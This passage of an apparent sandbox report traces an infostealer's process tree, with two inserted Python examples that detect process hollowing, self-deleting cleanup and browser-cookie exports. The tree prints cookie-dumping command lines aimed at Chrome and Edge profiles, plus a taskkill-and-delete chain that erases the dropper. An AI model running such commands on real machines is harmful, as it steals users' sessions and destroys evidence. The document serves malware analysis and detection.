      C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
      25⤵
      PID:11144
    • C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
      C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
      25⤵
      PID:9368
  • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
    "C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe"
    24⤵
    • Suspicious use of SetThreadContext
    PID:9164
    • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      25⤵
      PID:10760
    • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      25⤵
      PID:11180
    • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      25⤵
      • Suspicious use of SetThreadContext
      PID:8580
    • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      25⤵
      PID:10380
    • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
      25⤵
      PID:7328
  • C:\Users\Admin\Documents\zZUQe0xhiqeCB8MfIsGDRvq_.exe
    "C:\Users\Admin\Documents\zZUQe0xhiqeCB8MfIsGDRvq_.exe"
    24⤵
    • Suspicious use of SetThreadContext
    PID:10004
    • C:\Users\Admin\Documents\zZUQe0xhiqeCB8MfIsGDRvq_.exe
      C:\Users\Admin\Documents\zZUQe0xhiqeCB8MfIsGDRvq_.exe
      25⤵
      PID:10696
  • C:\Users\Admin\Documents\PadoXcwVnD4LB1m1Nl31Ar9T.exe
    "C:\Users\Admin\Documents\PadoXcwVnD4LB1m1Nl31Ar9T.exe"
    24⤵
    PID:10224
    • C:\Users\Admin\AppData\Roaming\8421563.exe
      "C:\Users\Admin\AppData\Roaming\8421563.exe"
      25⤵
      PID:10332
  • C:\Users\Admin\Documents\LVPzrmaNzVLWfCx45Zo57SX6.exe
    "C:\Users\Admin\Documents\LVPzrmaNzVLWfCx45Zo57SX6.exe"
    24⤵
    PID:3476
    • C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      25⤵
      PID:8800
    • C:\Users\Admin\Documents\LVPzrmaNzVLWfCx45Zo57SX6.exe
      "C:\Users\Admin\Documents\LVPzrmaNzVLWfCx45Zo57SX6.exe" -a
      25⤵
      PID:10396
  • C:\Users\Admin\Documents\W61gI9PcMNidYLTmkmLLmZfe.exe
    "C:\Users\Admin\Documents\W61gI9PcMNidYLTmkmLLmZfe.exe"
    24⤵
    PID:9848
    • C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      25⤵
      PID:4000
    • C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      25⤵
      PID:7820
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      25⤵
      PID:7028
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      25⤵
      • Loads dropped DLL
      PID:9276
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      25⤵
      PID:10612
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      25⤵
      PID:4852
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      25⤵
      PID:9660
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      25⤵
      PID:9920
  • C:\Users\Admin\Documents\lhzbQzLdkWniKoqfal7GhBHF.exe
    "C:\Users\Admin\Documents\lhzbQzLdkWniKoqfal7GhBHF.exe"
    24⤵
    PID:6932
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      25⤵
      PID:8632
      • C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\setup_install.exe"
        26⤵
        • Loads dropped DLL
        PID:10936
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                                                PID:5524
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\karotima_2.exe
                                                                                                                                                                                                                                                                                                                  karotima_2.exe
                                                                                                                                                                                                                                                                                                                  28⤵
                                                                                                                                                                                                                                                                                                                    PID:6880
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\karotima_2.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                      29⤵
                                                                                                                                                                                                                                                                                                                        PID:10228
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                                                                                                                                      PID:10684
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\7ZWFwbfiv6EqrZvoX4QhnZmZ.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\7ZWFwbfiv6EqrZvoX4QhnZmZ.exe"
                                                                                                                                                                                                                                                                                                                24⤵
                                                                                                                                                                                                                                                                                                                  PID:8468
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe"
                                                                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                  PID:6716
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe
                                                                                                                                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                                                                                                                                      PID:10736
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\cTAuvVlPPSRGWXeoFXM3dUKx.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\cTAuvVlPPSRGWXeoFXM3dUKx.exe"
                                                                                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    PID:7312
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                      PID:10796
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                        PID:9392
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                          PID:9388
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\8H9R1sYpqF5ecWnb1JVGY43L.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\8H9R1sYpqF5ecWnb1JVGY43L.exe"
                                                                                                                                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      PID:9116
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3213382.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3213382.exe"
                                                                                                                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                                                                                                                          PID:10548
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3353161.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3353161.exe"
                                                                                                                                                                                                                                                                                                                          25⤵
                                                                                                                                                                                                                                                                                                                            PID:11228
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe"
                                                                                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                          PID:10348
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                            PID:3476
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                              taskkill /im HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe /f
                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                              PID:9356
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                              PID:10400
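Two patterns in the tree above are worth pulling out automatically when triaging a report like this. The cmd.exe child of HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe (taskkill /im <own image> /f & timeout /t 6 & del /f /q "<own path>" & del C:\ProgramData\*.dll) is the cleanup routine an infostealer runs at exit so that the dropped binary and its helper DLLs are gone by the time anyone looks. And wherever a parent flagged "Suspicious use of SetThreadContext" starts a second copy of its own image (HKWciGDzZwJWnxlbqunavkBk.exe, 1234.exe) the tree has the shape of RunPE-style process hollowing: the child is created suspended, its memory is overwritten, its entry point is redirected with SetThreadContext and it is then resumed. The following is an added example, not part of the sandbox report or the sandbox vendor's code: a small Python parser for this report's process-tree notation (a "• <path>" line, the command line, an "N⤵" depth marker, signature bullets and a "PID:" line) that flags both patterns. The sample input is a constructed, abridged copy of entries from this section; the regexes, the Proc record and the two detection functions are the example's own and assume the notation stays exactly as shown.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: an abridged copy of entries from this section of the
# report. Indentation is ignored; parent/child links come from the "N⤵" depth
# markers, so the raw extraction whitespace would parse the same way.
SAMPLE = r"""
• C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe
  "C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe"
  24⤵
  • Suspicious use of SetThreadContext
  PID:6716
  • C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe
    C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe
    25⤵
    PID:10736
• C:\Users\Admin\Documents\HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe
  "C:\Users\Admin\Documents\HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe"
  24⤵
  • Checks processor information in registry
  PID:10348
  • C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe" & del C:\ProgramData\*.dll & exit
    25⤵
    • Blocklisted process makes network request
    PID:3476
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /im HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe /f
      26⤵
      • Kills process with taskkill
      PID:9356
    • C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      26⤵
      • Delays execution with timeout.exe
      PID:10400
"""


@dataclass
class Proc:
    path: str
    cmdline: str = ""
    depth: int = 0
    sigs: List[str] = field(default_factory=list)
    pid: Optional[int] = None
    parent: Optional["Proc"] = None


ENTRY_RE = re.compile(r"^• (?P<path>[A-Za-z]:\\.+)$")  # "• C:\...\x.exe" opens an entry
DEPTH_RE = re.compile(r"^(?P<d>\d+)⤵$")                 # tree depth marker
PID_RE = re.compile(r"^PID:(?P<pid>\d+)$")


def parse_tree(text: str) -> List[Proc]:
    """Turn the report's process-tree notation into Proc records with parent links.
    Entries come in pre-order, so the latest entry at depth d-1 is the parent of one at depth d."""
    procs: List[Proc] = []
    last_at_depth: Dict[int, Proc] = {}
    cur: Optional[Proc] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if m:
            cur = Proc(path=m.group("path"))
            procs.append(cur)
            continue
        if cur is None:  # stray attribute line before any entry (e.g. a cut-off report)
            continue
        m = DEPTH_RE.match(line)
        if m:
            cur.depth = int(m.group("d"))
            cur.parent = last_at_depth.get(cur.depth - 1)
            last_at_depth[cur.depth] = cur
            continue
        m = PID_RE.match(line)
        if m:
            cur.pid = int(m.group("pid"))
            continue
        if line.startswith("• "):
            cur.sigs.append(line[2:])  # signature bullet (no drive letter, so not an entry)
        elif not cur.cmdline:
            cur.cmdline = line         # the line right after the image path is the command line
    return procs


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_hollowing_candidates(procs: List[Proc]):
    """(parent_pid, child_pid) where a SetThreadContext-flagged parent runs a second copy of its own image."""
    return [(p.parent.pid, p.pid) for p in procs
            if p.parent is not None
            and "Suspicious use of SetThreadContext" in p.parent.sigs
            and basename(p.path) == basename(p.parent.path)]


def find_self_delete_chains(procs: List[Proc]):
    """cmd.exe child whose command line kills its parent's image and then deletes that image."""
    hits = []
    for p in procs:
        if p.parent is None or basename(p.path) != "cmd.exe":
            continue
        cl = p.cmdline.lower()
        target = basename(p.parent.path)
        segments = [s.strip() for s in cl.split("&")]
        kills = f"taskkill /im {target}" in cl
        deletes = any(s.startswith("del ") and target in s for s in segments)
        if kills and deletes:
            hits.append({"parent_pid": p.parent.pid, "cmd_pid": p.pid,
                         "delayed": "timeout /t" in cl, "target": p.parent.path})
    return hits


if __name__ == "__main__":
    tree = parse_tree(SAMPLE)
    for parent, child in find_hollowing_candidates(tree):
        print(f"possible hollowing: {parent} -> {child}")
    for h in find_self_delete_chains(tree):
        print(f"self-delete chain: pid {h['parent_pid']} via cmd {h['cmd_pid']} ({h['target']})")
```

Run over the whole section rather than the sample, the same rules would also pair 1234.exe (10796) with its two "{path}" children, and would not fire on the setup_install.exe / karotima_2.exe chain, where cmd.exe is used only as a launcher and the relaunch (-a) is not preceded by a SetThreadContext flag. The self-delete rule keys on the parent's own image name, so a generic taskkill of some other process does not match; the "delayed" field records the timeout /t that gives the parent time to exit before the delete runs.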
• C:\Users\Admin\Documents\CBnnMYG2tH0jRk8uDhQWuLLk.exe
  "C:\Users\Admin\Documents\CBnnMYG2tH0jRk8uDhQWuLLk.exe"
  24⤵
  • Suspicious use of SetThreadContext
  PID:10544
  • C:\Users\Admin\Documents\CBnnMYG2tH0jRk8uDhQWuLLk.exe
    "C:\Users\Admin\Documents\CBnnMYG2tH0jRk8uDhQWuLLk.exe"
    25⤵
    • Loads dropped DLL
    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                            PID:2132
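Two checks a detection engineer would run over a process tree like this one, as an added example that is not part of the sandbox report. The first flags a process that launches its own image while the parent carries the "Suspicious use of SetThreadContext" signature (the self-spawning Documents\*.exe pairs in this tree); that combination is the shape of process hollowing, which is an inference from the signature, not a finding the report states. The second flags command lines that export a browser cookie database with /CookiesFile "...\Cookies" /scookiestxt <output> (the 11111.exe and 22222.exe children of w0r92Fdo8l3RBiKXLLeV1zjH.exe further down the tree) and groups them by output file. The records are constructed from the tree: PIDs, image paths, command lines and signature labels are copied as shown, parent PIDs follow the 19⤵/20⤵ depth markers, and depth-19 parents that sit outside this excerpt are left as None. Function names and the grouping logic are this example's own, and nothing is claimed about what 11111.exe and 22222.exe are beyond the switches visible in their command lines.

```python
"""Added example, not part of the sandbox report: two checks over a
Triage-style process tree. Records are constructed from the tree on this
page (PIDs, images, command lines, signature labels as shown; parent PIDs
from the 19/20 depth markers; parents outside the excerpt are None)."""
import re
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class Proc:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str
    signatures: list = field(default_factory=list)

DOCS = r"C:\Users\Admin\Documents"
LOCAL = r"C:\Users\Admin\AppData\Local"
TMP = LOCAL + r"\Temp"
OUT = TMP + r"\fj4ghga23_fsa.txt"          # shared cookie-dump output file
CBNN = DOCS + r"\CBnnMYG2tH0jRk8uDhQWuLLk.exe"
LTO = DOCS + r"\6LtOwaCr70vwNVWdVNLr6uSF.exe"
W0R9 = DOCS + r"\w0r92Fdo8l3RBiKXLLeV1zjH.exe"
HOLLOW_SIG = "Suspicious use of SetThreadContext"

def cookie_cmd(tool, store=None):
    """Rebuild the cookie-export command lines exactly as the tree shows them."""
    src = f'/CookiesFile "{store}" ' if store else ""
    return f"{TMP}\\{tool} {src}/scookiestxt {OUT}"

PROCS = [  # constructed from the page's process tree
    Proc(10544, None, CBNN, f'"{CBNN}"', [HOLLOW_SIG]),
    Proc(2132, 10544, CBNN, f'"{CBNN}"',
         ["Loads dropped DLL", "Checks processor information in registry"]),
    Proc(6212, None, LTO, f'"{LTO}"', [HOLLOW_SIG]),
    Proc(7892, 6212, LTO, LTO),
    Proc(5468, 6212, LTO, LTO),
    Proc(4948, None, W0R9, f'"{W0R9}"'),
    Proc(9560, 4948, TMP + r"\11111.exe", cookie_cmd("11111.exe"), ["Loads dropped DLL"]),
    Proc(5404, 4948, TMP + r"\11111.exe",
         cookie_cmd("11111.exe", LOCAL + r"\Google\Chrome\User Data\Profile 2\Cookies")),
    Proc(10164, 4948, TMP + r"\22222.exe",
         cookie_cmd("22222.exe", LOCAL + r"\Microsoft\Edge\User Data\Default\Cookies")),
    Proc(11004, 4948, TMP + r"\22222.exe",
         cookie_cmd("22222.exe", LOCAL + r"\Microsoft\Edge\User Data\Profile 1\Cookies")),
]

def self_spawn_with_setthreadcontext(procs):
    """Child runs the same image as its parent and the parent carries the
    SetThreadContext signature: the shape of process hollowing (spawn own
    image suspended, overwrite it, SetThreadContext, resume)."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for child in procs:
        parent = by_pid.get(child.ppid)
        if (parent and parent.image.lower() == child.image.lower()
                and HOLLOW_SIG in parent.signatures):
            hits.append((parent.pid, child.pid, child.image))
    return hits

COOKIES_FILE = re.compile(r'/CookiesFile\s+"([^"]+)"', re.I)
COOKIES_OUT = re.compile(r'/scookiestxt\s+(?:"([^"]+)"|(\S+))', re.I)

def browser_from_store(path):
    low = path.lower()
    if r"\google\chrome\user data" in low:
        return "Chrome"
    if r"\microsoft\edge\user data" in low:
        return "Edge"
    return "unknown"

def cookie_exports(procs):
    """Command lines that export a browser cookie database to a text file;
    without /CookiesFile the tool reads whatever its default store is."""
    hits = []
    for p in procs:
        out = COOKIES_OUT.search(p.cmdline)
        if not out:
            continue
        src = COOKIES_FILE.search(p.cmdline)
        store = src.group(1) if src else None
        hits.append({
            "pid": p.pid, "ppid": p.ppid, "tool": p.image.rsplit("\\", 1)[-1],
            "browser": browser_from_store(store) if store else "default store",
            "profile": store.split("\\")[-2] if store else None,
            "output": out.group(1) or out.group(2),
        })
    return hits

def staging_files(exports):
    """Group exports by output file: one file fed by several browsers and
    profiles is the stealer's staging artifact to collect from the host."""
    by_out = {}
    for h in exports:
        by_out.setdefault(h["output"], []).append(h["pid"])
    return by_out

if __name__ == "__main__":
    print(self_spawn_with_setthreadcontext(PROCS))
    print(staging_files(cookie_exports(PROCS)))
```

Run as a script it prints the hollowing candidates and the single staging file fj4ghga23_fsa.txt that four separate exports (Chrome default store, Chrome Profile 2, Edge Default, Edge Profile 1) all append to; in practice PROCS would be built from the report's JSON rather than typed in, and the output file plus the Temp-dropped tools are the artifacts to pull from the host.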
• C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
  "C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe"
  19⤵
  • Suspicious use of SetThreadContext
  PID:6212
    • C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
      C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
      20⤵
      PID:7892
    • C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
      C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
      20⤵
      PID:5468
• C:\Users\Admin\Documents\Gzki2vPFZ24D6So293TCKWVC.exe
  "C:\Users\Admin\Documents\Gzki2vPFZ24D6So293TCKWVC.exe"
  19⤵
  • Suspicious use of SetThreadContext
  PID:7088
    • C:\Users\Admin\Documents\Gzki2vPFZ24D6So293TCKWVC.exe
      C:\Users\Admin\Documents\Gzki2vPFZ24D6So293TCKWVC.exe
      20⤵
      PID:9540
• C:\Users\Admin\Documents\ku00Gx3L5SltbhCZ5cyC1Ko_.exe
  "C:\Users\Admin\Documents\ku00Gx3L5SltbhCZ5cyC1Ko_.exe"
  19⤵
  • Drops file in Program Files directory
  PID:4756
• C:\Users\Admin\Documents\uL6morXuH1gwxChLdnZUGRhX.exe
  "C:\Users\Admin\Documents\uL6morXuH1gwxChLdnZUGRhX.exe"
  19⤵
  • Suspicious use of SetThreadContext
  PID:7436
    • C:\Users\Admin\Documents\uL6morXuH1gwxChLdnZUGRhX.exe
      C:\Users\Admin\Documents\uL6morXuH1gwxChLdnZUGRhX.exe
      20⤵
      PID:10432
• C:\Users\Admin\Documents\rEYjqk2DCXbD04znqw7_lUTq.exe
  "C:\Users\Admin\Documents\rEYjqk2DCXbD04znqw7_lUTq.exe"
  19⤵
  • Checks whether UAC is enabled
  PID:10180
• C:\Users\Admin\Documents\kXiMTHrHNAq5rAhBTHtEmG9A.exe
  "C:\Users\Admin\Documents\kXiMTHrHNAq5rAhBTHtEmG9A.exe"
  19⤵
  PID:8520
    • C:\Users\Admin\AppData\Roaming\4754634.exe
      "C:\Users\Admin\AppData\Roaming\4754634.exe"
      20⤵
      PID:8240
• C:\Users\Admin\Documents\Ax0mC2NZC04LSQSiW0hapBj7.exe
  "C:\Users\Admin\Documents\Ax0mC2NZC04LSQSiW0hapBj7.exe"
  19⤵
  • Suspicious use of SetThreadContext
  PID:6848
    • C:\Users\Admin\Documents\Ax0mC2NZC04LSQSiW0hapBj7.exe
      "C:\Users\Admin\Documents\Ax0mC2NZC04LSQSiW0hapBj7.exe"
      20⤵
      • Checks processor information in registry
      PID:9328
• C:\Users\Admin\Documents\w0r92Fdo8l3RBiKXLLeV1zjH.exe
  "C:\Users\Admin\Documents\w0r92Fdo8l3RBiKXLLeV1zjH.exe"
  19⤵
  PID:4948
    • C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      20⤵
      • Loads dropped DLL
      PID:9560
    • C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      20⤵
      PID:5404
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      20⤵
      PID:10164
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      20⤵
      PID:11004
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      20⤵
      PID:5484
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      20⤵
      PID:9512
    • C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                                                                                                                            PID:4460
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                                                                                              PID:4164
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\RA5z9D8fl4Irup9xAMNHTebC.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\RA5z9D8fl4Irup9xAMNHTebC.exe"
                                                                                                                                                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                            PID:6368
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\Ifj1vSAkTcMWjyqQ5MGnXFPS.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\Ifj1vSAkTcMWjyqQ5MGnXFPS.exe"
                                                                                                                                                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                                                                                                                                                              PID:3476
